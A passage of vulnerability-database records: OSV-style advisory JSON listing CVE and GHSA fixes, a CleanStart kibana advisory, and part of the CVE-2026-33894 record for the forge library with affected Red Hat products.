"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42037"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42038"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42040"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42042"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42264"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6321"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6322"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-15599, CVE-2025-62718, CVE-2025-69873, CVE-2026-0540, CVE-2026-25639, CVE-2026-2739, CVE-2026-27903, CVE-2026-27904, CVE-2026-2950, CVE-2026-33750, CVE-2026-33916, CVE-2026-33937, CVE-2026-35213, CVE-2026-40175, CVE-2026-41238, CVE-2026-41239, CVE-2026-41240, CVE-2026-42033, CVE-2026-42034, CVE-2026-42035, CVE-2026-42036, CVE-2026-42037, CVE-2026-42038, CVE-2026-42039, CVE-2026-42040, CVE-2026-42041, CVE-2026-42042, CVE-2026-42043, CVE-2026-42044, CVE-2026-42264, CVE-2026-4800, CVE-2026-6321, CVE-2026-6322, ghsa-2328-f5f3-gj25, ghsa-23c5-xmqv-rm74, ghsa-2g4f-4pwh-qvx6, ghsa-2qvq-rjwj-gvw9, ghsa-2w6w-674q-4c4q, ghsa-378v-28hj-76wf, ghsa-37qj-frw5-hhjh, ghsa-39q2-94rc-95cp, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3ppc-4f35-3m26, ghsa-3v7f-55p6-f55p, ghsa-3w6x-2g7m-8v23, ghsa-43fc-jf86-j433, ghsa-442j-39wm-28r2, ghsa-445q-vr5w-6q77, ghsa-5c6j-r48x-rmvq, ghsa-5c9x-8gcm-mpgx, ghsa-5m6q-g25r-mvwx, ghsa-62hf-57xw-28j9, ghsa-6475-r3vj-m8vf, ghsa-6chq-wfr3-2hj9, ghsa-7r86-cg39-jmmj, ghsa-7rx3-28cr-v5wh, ghsa-83g3-92jg-28cx, ghsa-8gc5-j5rx-235r, ghsa-9cx6-37pm-9jff, ghsa-9ppj-qmqm-q256, ghsa-c2c7-rcm5-vvqj, ghsa-cj63-jhhr-wcxv, ghsa-cjmm-f4jc-qw8r, ghsa-crv5-9vww-q3g8, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-fj3w-jwp8-x2g3, ghsa-fvcv-3m26-pcqx, ghsa-gh4j-gqv2-49f6, ghsa-h7mw-gpvr-xq4m, ghsa-h8r8-wccr-v5f2, ghsa-jg4p-7fhp-p32p, ghsa-jmr7-xgp7-cmfj, ghsa-jp2q-39xq-3w4g, ghsa-m7jm-9gc2-mpf2, ghsa-m7pr-hjqh-92cm, ghsa-pf86-5x62-jrwf, ghsa-pmwg-cvhr-8vh7, ghsa-ppp5-5v6c-4jwp, ghsa-q3j6-qgpj-74h6, ghsa-q67f-28xg-22rw, ghsa-q8qp-cvcw-x6jj, ghsa-qffp-2rhf-9h96, ghsa-qj8w-gfj5-8c6v, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-v2v4-37r5-5v8g, ghsa-v2wj-7wpq-c8vv, ghsa-v39h-62p7-jpjc, ghsa-v8jm-5vwx-cfxm, ghsa-v9jr-rg53-9pgp, ghsa-vf2m-468p-8v99, ghsa-w5hq-g745-h8pq, ghsa-w7fw-mjwx-w883, ghsa-w9j2-pvgh-6h63, ghsa-xhjh-pmcv-23jw, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf, ghsa-xx6v-rp6x-q39c applied in versions: 3.5.0-r0, 3.5.0-r1, 3.5.0-r2",
"upstream": [
"CVE-2025-15599",
"CVE-2025-62718",
"CVE-2025-69873",
"CVE-2026-0540",
"CVE-2026-25639",
"CVE-2026-2739",
"CVE-2026-27903",
"CVE-2026-27904",
"CVE-2026-2950",
"CVE-2026-33750",
"CVE-2026-33916",
"CVE-2026-33937",
"CVE-2026-35213",
"CVE-2026-40175",
"CVE-2026-41238",
"CVE-2026-41239",
"CVE-2026-41240",
"CVE-2026-42033",
"CVE-2026-42034",
"CVE-2026-42035",
"CVE-2026-42036",
"CVE-2026-42037",
"CVE-2026-42038",
"CVE-2026-42039",
"CVE-2026-42040",
"CVE-2026-42041",
"CVE-2026-42042",
"CVE-2026-42043",
"CVE-2026-42044",
"CVE-2026-42264",
"CVE-2026-4800",
"CVE-2026-6321",
"CVE-2026-6322",
"ghsa-2328-f5f3-gj25",
"ghsa-23c5-xmqv-rm74",
"ghsa-2g4f-4pwh-qvx6",
"ghsa-2qvq-rjwj-gvw9",
"ghsa-2w6w-674q-4c4q",
"ghsa-378v-28hj-76wf",
"ghsa-37qj-frw5-hhjh",
"ghsa-39q2-94rc-95cp",
"ghsa-3mfm-83xf-c92r",
"ghsa-3p68-rc4w-qgx5",
"ghsa-3ppc-4f35-3m26",
"ghsa-3v7f-55p6-f55p",
"ghsa-3w6x-2g7m-8v23",
"ghsa-43fc-jf86-j433",
"ghsa-442j-39wm-28r2",
"ghsa-445q-vr5w-6q77",
"ghsa-5c6j-r48x-rmvq",
"ghsa-5c9x-8gcm-mpgx",
"ghsa-5m6q-g25r-mvwx",
"ghsa-62hf-57xw-28j9",
"ghsa-6475-r3vj-m8vf",
"ghsa-6chq-wfr3-2hj9",
"ghsa-7r86-cg39-jmmj",
"ghsa-7rx3-28cr-v5wh",
"ghsa-83g3-92jg-28cx",
"ghsa-8gc5-j5rx-235r",
"ghsa-9cx6-37pm-9jff",
"ghsa-9ppj-qmqm-q256",
"ghsa-c2c7-rcm5-vvqj",
"ghsa-cj63-jhhr-wcxv",
"ghsa-cjmm-f4jc-qw8r",
"ghsa-crv5-9vww-q3g8",
"ghsa-f23m-r3pf-42rh",
"ghsa-f886-m6hf-6m8v",
"ghsa-fj3w-jwp8-x2g3",
"ghsa-fvcv-3m26-pcqx",
"ghsa-gh4j-gqv2-49f6",
"ghsa-h7mw-gpvr-xq4m",
"ghsa-h8r8-wccr-v5f2",
"ghsa-jg4p-7fhp-p32p",
"ghsa-jmr7-xgp7-cmfj",
"ghsa-jp2q-39xq-3w4g",
"ghsa-m7jm-9gc2-mpf2",
"ghsa-m7pr-hjqh-92cm",
"ghsa-pf86-5x62-jrwf",
"ghsa-pmwg-cvhr-8vh7",
"ghsa-ppp5-5v6c-4jwp",
"ghsa-q3j6-qgpj-74h6",
"ghsa-q67f-28xg-22rw",
"ghsa-q8qp-cvcw-x6jj",
"ghsa-qffp-2rhf-9h96",
"ghsa-qj8w-gfj5-8c6v",
"ghsa-r4q5-vmmm-2653",
"ghsa-r5fr-rjxr-66jc",
"ghsa-v2v4-37r5-5v8g",
"ghsa-v2wj-7wpq-c8vv",
"ghsa-v39h-62p7-jpjc",
"ghsa-v8jm-5vwx-cfxm",
"ghsa-v9jr-rg53-9pgp",
"ghsa-vf2m-468p-8v99",
"ghsa-w5hq-g745-h8pq",
"ghsa-w7fw-mjwx-w883",
"ghsa-w9j2-pvgh-6h63",
"ghsa-xhjh-pmcv-23jw",
"ghsa-xhpv-hc6g-r9c6",
"ghsa-xjpj-3mr7-gcpf",
"ghsa-xx6v-rp6x-q39c"
]
}
cleanstart-2026-ml12367
Vulnerability from cleanstart
Multiple security vulnerabilities affect the kibana package. These issues are resolved in later releases. See references for individual vulnerability details.
| URL | Type | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "kibana"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.3.2-r3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the kibana package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-ML12367",
"modified": "2026-05-21T06:39:47Z",
"published": "2026-05-21T08:09:24.246960Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-ML12367.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2328-f5f3-gj25"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3644-q5cj-c5c7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-378v-28hj-76wf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-48c2-rrv3-qjmp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4rc3-7j7w-m548"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-56p5-8mhr-2fph"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5m6q-g25r-mvwx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5vv4-hvf7-2h46"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-66ff-xgx4-vchm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-685m-2w69-288q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6chq-wfr3-2hj9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6v7q-wjvx-w8wg"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-75px-5xx7-5xc7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9c88-49p5-5ggf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-chqc-8p9q-pq6q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f269-vfmq-vjvj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-hvx9-hwr7-wjj9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-j3q9-mxjg-w52f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jg4p-7fhp-p32p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jp2q-39xq-3w4g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jvwf-75h9-cwgg"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pf86-5x62-jrwf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-ppp5-5v6c-4jwp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q3j6-qgpj-74h6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q67f-28xg-22rw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q7rr-3cgh-j5r3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r399-636x-v7f6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r4q5-vmmm-2653"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rp42-5vxx-qpwr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rpmf-866q-6p89"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v39h-62p7-jpjc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v9p9-hfj2-hcw8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vrm6-8vpv-qv8q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vvjj-xcjg-gr5g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w5hq-g745-h8pq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wmfp-5q7x-987x"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wphj-fx3q-84ch"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xq3m-2v4x-88gg"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for ghsa-2328-f5f3-gj25, ghsa-2w6w-674q-4c4q, ghsa-3644-q5cj-c5c7, ghsa-378v-28hj-76wf, ghsa-3v7f-55p6-f55p, ghsa-48c2-rrv3-qjmp, ghsa-4rc3-7j7w-m548, ghsa-56p5-8mhr-2fph, ghsa-5m6q-g25r-mvwx, ghsa-5vv4-hvf7-2h46, ghsa-66ff-xgx4-vchm, ghsa-685m-2w69-288q, ghsa-6chq-wfr3-2hj9, ghsa-6v7q-wjvx-w8wg, ghsa-75px-5xx7-5xc7, ghsa-8gc5-j5rx-235r, ghsa-9c88-49p5-5ggf, ghsa-c2c7-rcm5-vvqj, ghsa-chqc-8p9q-pq6q, ghsa-f269-vfmq-vjvj, ghsa-f886-m6hf-6m8v, ghsa-hvx9-hwr7-wjj9, ghsa-j3q9-mxjg-w52f, ghsa-jg4p-7fhp-p32p, ghsa-jp2q-39xq-3w4g, ghsa-jvwf-75h9-cwgg, ghsa-pf86-5x62-jrwf, ghsa-ppp5-5v6c-4jwp, ghsa-q3j6-qgpj-74h6, ghsa-q67f-28xg-22rw, ghsa-q7rr-3cgh-j5r3, ghsa-r399-636x-v7f6, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-rp42-5vxx-qpwr, ghsa-rpmf-866q-6p89, ghsa-v2v4-37r5-5v8g, ghsa-v39h-62p7-jpjc, ghsa-v9p9-hfj2-hcw8, ghsa-vrm6-8vpv-qv8q, ghsa-vvjj-xcjg-gr5g, ghsa-w5hq-g745-h8pq, ghsa-wmfp-5q7x-987x, ghsa-wphj-fx3q-84ch, ghsa-xq3m-2v4x-88gg applied in versions: 9.3.2-r3",
"upstream": [
"ghsa-2328-f5f3-gj25",
"ghsa-2w6w-674q-4c4q",
"ghsa-3644-q5cj-c5c7",
"ghsa-378v-28hj-76wf",
"ghsa-3v7f-55p6-f55p",
"ghsa-48c2-rrv3-qjmp",
"ghsa-4rc3-7j7w-m548",
"ghsa-56p5-8mhr-2fph",
"ghsa-5m6q-g25r-mvwx",
"ghsa-5vv4-hvf7-2h46",
"ghsa-66ff-xgx4-vchm",
"ghsa-685m-2w69-288q",
"ghsa-6chq-wfr3-2hj9",
"ghsa-6v7q-wjvx-w8wg",
"ghsa-75px-5xx7-5xc7",
"ghsa-8gc5-j5rx-235r",
"ghsa-9c88-49p5-5ggf",
"ghsa-c2c7-rcm5-vvqj",
"ghsa-chqc-8p9q-pq6q",
"ghsa-f269-vfmq-vjvj",
"ghsa-f886-m6hf-6m8v",
"ghsa-hvx9-hwr7-wjj9",
"ghsa-j3q9-mxjg-w52f",
"ghsa-jg4p-7fhp-p32p",
"ghsa-jp2q-39xq-3w4g",
"ghsa-jvwf-75h9-cwgg",
"ghsa-pf86-5x62-jrwf",
"ghsa-ppp5-5v6c-4jwp",
"ghsa-q3j6-qgpj-74h6",
"ghsa-q67f-28xg-22rw",
"ghsa-q7rr-3cgh-j5r3",
"ghsa-r399-636x-v7f6",
"ghsa-r4q5-vmmm-2653",
"ghsa-r5fr-rjxr-66jc",
"ghsa-rp42-5vxx-qpwr",
"ghsa-rpmf-866q-6p89",
"ghsa-v2v4-37r5-5v8g",
"ghsa-v39h-62p7-jpjc",
"ghsa-v9p9-hfj2-hcw8",
"ghsa-vrm6-8vpv-qv8q",
"ghsa-vvjj-xcjg-gr5g",
"ghsa-w5hq-g745-h8pq",
"ghsa-wmfp-5q7x-987x",
"ghsa-wphj-fx3q-84ch",
"ghsa-xq3m-2v4x-88gg"
]
}
CVE-2026-33894 (GCVE-0-2026-33894)
Vulnerability from cvelistv5 – Published: 2026-03-27 20:45 – Updated: 2026-07-15 01:05| URL | Tags |
|---|---|
| https://github.com/digitalbazaar/forge/security/a… | x_refsource_CONFIRM |
| https://datatracker.ietf.org/doc/html/rfc2313#section-8 | x_refsource_MISC |
| https://mailarchive.ietf.org/arch/msg/openpgp/5rn… | x_refsource_MISC |
| https://www.rfc-editor.org/rfc/rfc8017.html | x_refsource_MISC |
| https://access.redhat.com/security/cve/CVE-2026-33894 | vdb-entryx_refsource_REDHAT |
| https://bugzilla.redhat.com/show_bug.cgi?id=2452464 | issue-trackingx_refsource_REDHAT |
| https://security.access.redhat.com/data/csaf/v2/v… | x_sadp-csaf-vex |
| https://access.redhat.com/errata/RHSA-2026:24761 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:34342 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:9742 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:13826 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:22840 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:22629 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:21017 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:24853 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:19375 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:22465 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:23361 | vendor-advisoryx_refsource_REDHAT |
| Vendor | Product | Version | |
|---|---|---|---|
| digitalbazaar | forge |
Affected:
< 1.4.0
|
|
| Red Hat | Red Hat Ansible Automation Platform 2.5 for RHEL 8 |
Unaffected:
0:2.5.20260422-3.el8ap , < *
(rpm)
cpe:/a:redhat:ansible_automation_platform:2.5::el8 |
|
| Red Hat | Red Hat Ansible Automation Platform 2.5 for RHEL 9 |
Unaffected:
0:2.5.20260422-3.el9ap , < *
(rpm)
cpe:/a:redhat:ansible_automation_platform:2.5::el9 |
|
| Red Hat | Cluster Observability Operator 1.5.0 |
Unaffected:
1782839279 , < *
(rpm)
cpe:/a:redhat:cluster_observability_operator:1.5::el9 |
|
| Red Hat | Red Hat Developer Hub 1.8 |
Unaffected:
1776784286 , < *
(rpm)
cpe:/a:redhat:rhdh:1.8::el9 |
|
| Red Hat | Red Hat Developer Hub 1.9 |
Unaffected:
1777903262 , < *
(rpm)
cpe:/a:redhat:rhdh:1.9::el9 |
|
| Red Hat | Red Hat Quay 3.10 |
Unaffected:
1779822261 , < *
(rpm)
cpe:/a:redhat:quay:3.10::el8 |
|
| Red Hat | Red Hat Quay 3.12 |
Unaffected:
1779811412 , < *
(rpm)
cpe:/a:redhat:quay:3.12::el8 |
|
| Red Hat | Red Hat Quay 3.14 |
Unaffected:
1779689392 , < *
(rpm)
cpe:/a:redhat:quay:3.14::el8 |
|
| Red Hat | Red Hat Quay 3.15 |
Unaffected:
1780891395 , < *
(rpm)
cpe:/a:redhat:quay:3.15::el8 |
|
| Red Hat | Red Hat Quay 3.16 |
Unaffected:
1779204086 , < *
(rpm)
cpe:/a:redhat:quay:3.16::el9 |
|
| Red Hat | Red Hat Quay 3.17 |
Unaffected:
1779922205 , < *
(rpm)
cpe:/a:redhat:quay:3.17::el9 |
|
| Red Hat | Red Hat Quay 3.9 |
Unaffected:
1779811473 , < *
(rpm)
cpe:/a:redhat:quay:3.9::el8 |
|
| Red Hat | Cryostat 4 |
cpe:/a:redhat:cryostat:4 |
|
| Red Hat | Logging Subsystem for Red Hat OpenShift |
cpe:/a:redhat:logging:5 |
|
| Red Hat | Red Hat Ansible Automation Platform 2 |
cpe:/a:redhat:ansible_automation_platform:2 |
|
| Red Hat | Red Hat build of Apache Camel - HawtIO 4 |
cpe:/a:redhat:apache_camel_hawtio:4 |
|
| Red Hat | Red Hat build of Apicurio Registry 2 |
cpe:/a:redhat:service_registry:2 |
|
| Red Hat | Red Hat Build of Podman Desktop |
cpe:/a:redhat:podman_desktop:1 |
|
| Red Hat | Red Hat Data Grid 8 |
cpe:/a:redhat:jboss_data_grid:8 |
|
| Red Hat | Red Hat Enterprise Linux 10 |
cpe:/o:redhat:enterprise_linux:10 |
|
| Red Hat | Red Hat Enterprise Linux 8 |
cpe:/o:redhat:enterprise_linux:8 |
|
| Red Hat | Red Hat Enterprise Linux 9 |
cpe:/o:redhat:enterprise_linux:9 |
|
| Red Hat | Red Hat Fuse 7 |
cpe:/a:redhat:jboss_fuse:7 |
|
| Red Hat | Red Hat Process Automation 7 |
cpe:/a:redhat:jboss_enterprise_bpms_platform:7 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33894",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-31T14:04:30.304300Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-31T14:05:14.708Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el8"
],
"defaultStatus": "affected",
"packageName": "automation-gateway",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.5.20260422-3.el8ap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el9"
],
"defaultStatus": "affected",
"packageName": "automation-gateway",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.5.20260422-3.el9ap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:cluster_observability_operator:1.5::el9"
],
"defaultStatus": "affected",
"packageName": "cluster-observability-operator/logging-console-plugin-pf4-rhel9",
"product": "Cluster Observability Operator 1.5.0",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1782839279",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:rhdh:1.8::el9"
],
"defaultStatus": "affected",
"packageName": "rhdh/rhdh-hub-rhel9",
"product": "Red Hat Developer Hub 1.8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1776784286",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:rhdh:1.9::el9"
],
"defaultStatus": "affected",
"packageName": "rhdh/rhdh-hub-rhel9",
"product": "Red Hat Developer Hub 1.9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1777903262",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:quay:3.10::el8"
],
"defaultStatus": "affected",
"packageName": "quay/quay-rhel8",
"product": "Red Hat Quay 3.10",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1779822261",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:quay:3.12::el8"
],
"defaultStatus": "affected",
"packageName": "quay/quay-rhel8",
"product": "Red Hat Quay 3.12",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1779811412",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:quay:3.14::el8"
],
"defaultStatus": "affected",
"packageName": "quay/quay-rhel8",
"product": "Red Hat Quay 3.14",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1779689392",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:quay:3.15::el8"
],
"defaultStatus": "affected",
"packageName": "quay/quay-rhel8",
"product": "Red Hat Quay 3.15",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1780891395",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:quay:3.16::el9"
],
"defaultStatus": "affected",
"packageName": "quay/quay-rhel9",
"product": "Red Hat Quay 3.16",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1779204086",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:quay:3.17::el9"
],
"defaultStatus": "affected",
"packageName": "quay/quay-rhel9",
"product": "Red Hat Quay 3.17",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1779922205",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:quay:3.9::el8"
],
"defaultStatus": "affected",
"packageName": "quay/quay-rhel8",
"product": "Red Hat Quay 3.9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "1779811473",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:cryostat:4"
],
"defaultStatus": "unaffected",
"packageName": "io.cryostat-cryostat",
"product": "Cryostat 4",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:logging:5"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch6-rhel9",
"product": "Logging Subsystem for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:logging:5"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-operator-bundle",
"product": "Logging Subsystem for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:logging:5"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-proxy-rhel9",
"product": "Logging Subsystem for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:logging:5"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-rhel9-operator",
"product": "Logging Subsystem for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:logging:5"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/kibana6-rhel8",
"product": "Logging Subsystem for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:logging:5"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-curator5-rhel9",
"product": "Logging Subsystem for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "unaffected",
"packageName": "automation-eda-controller",
"product": "Red Hat Ansible Automation Platform 2",
